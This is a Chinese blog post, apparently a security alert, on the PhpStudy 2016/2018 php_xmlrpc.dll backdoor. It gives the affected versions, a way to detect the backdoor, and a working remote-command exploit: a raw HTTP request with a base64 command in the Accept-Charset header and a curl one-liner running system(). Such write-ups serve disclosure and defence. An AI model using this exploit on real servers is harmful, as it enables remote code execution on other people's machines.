PhpStudy2016&2018后门漏洞预警及漏洞复现

    选择打赏方式

影响版本

目前已知受影响的phpstudy版本

  • phpstudy 2016版php-5.4
  • phpstudy 2018版php-5.2.17
  • phpstudy 2018版php-5.4.45

后门检测分析

通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy2016路径

  • php\php-5.2.17\ext\php_xmlrpc.dll
  • php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

  • PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
  • PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

用notepad打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在,如图:

1.png

phpstudy 2018漏洞复现

启动phpstudy,选择php-5.2.17版本,使用burpsuit抓包(如果是本机127.0.0.1环境,代理去掉本地过滤,否则抓不到包)。

2.png

exp如下:

GET /index.php HTTP/1.1

Host: yourip.com

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3730.400 QQBrowser/10.5.3805.400

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip,deflate

Accept-Charset:这里就是你要执行的代码命令(经过base64加密)

Accept-Language: zh-CN,zh;q=0.9

Connection: close

我们修改数据包查看命令phpinfo();执行情况

3.png

继续修改数据包查看命令echo system("net user");执行情况

4.png

漏洞复现成功

ps:我复现的时候这里有一个坑,就是直接repeater过来的数据包Accept-Encoding字段的参数是gzip, deflate,deflate前面有一个空格,去掉就可以成功执行命令了

还有第二种方法,已知存在漏洞情况下,来自大佬提供的exp:

curl -H "Accept-Charset: $(echo 'system("ipconfig");' | base64)" -H 'Accept-Encoding: gzip,deflate'  http://www.xxx.com/xx.php

附:PhpStudy2018后门检测和执行POC脚本

版权声明:若无特殊注明,本文皆为《 奶沫 》原创,转载请保留文章出处。
本文链接:PhpStudy2016&2018后门漏洞预警及漏洞复现 https://itho.cn/ldqb/217.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框

吃奶的力气提交吐槽中...


既然没有吐槽,那就赶紧抢沙发吧!